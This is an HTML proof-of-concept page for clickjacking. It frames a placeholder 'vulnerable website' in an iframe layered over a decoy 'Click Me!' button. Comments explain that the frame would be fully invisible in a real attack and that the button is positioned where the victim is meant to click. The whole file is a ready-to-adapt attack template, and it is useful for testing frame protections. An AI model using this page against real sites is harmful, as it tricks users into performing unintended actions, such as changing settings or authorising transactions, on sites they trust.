<!DOCTYPE html>
<html>
  <head>
    <title>clickjacking.site</title>
  </head>
  <style>
    #myframe{
      width: 100%;
      height: 600px;
      border: none;
      position: absolute;
      top: 0px;
      bottom: 0px;
      left: 0px;
      right: 0px;
      z-index: 1;
      opacity: 0.2; /* for demonstrating purposes, in attacking scenarion this would be set to 0 */
    }
    #clickjackingbtn{
      /* customizable according to the vulnerable website, the button should be positioned where the victim should be tricked to click on */
      width: 100px;
      height: 100px;
      padding-left: 200px;
      padding-top: 500px;
      z-index: -1;
    }
  </style>
  <body>
    <iframe id="myframe" src="http://vulnerablewebsite.com/index.php" scrolling="no"></iframe>
    <!-- Clickjacking button --->
    <button id="clickjackingbtn">Click Me!</button>
  </body>
</html>
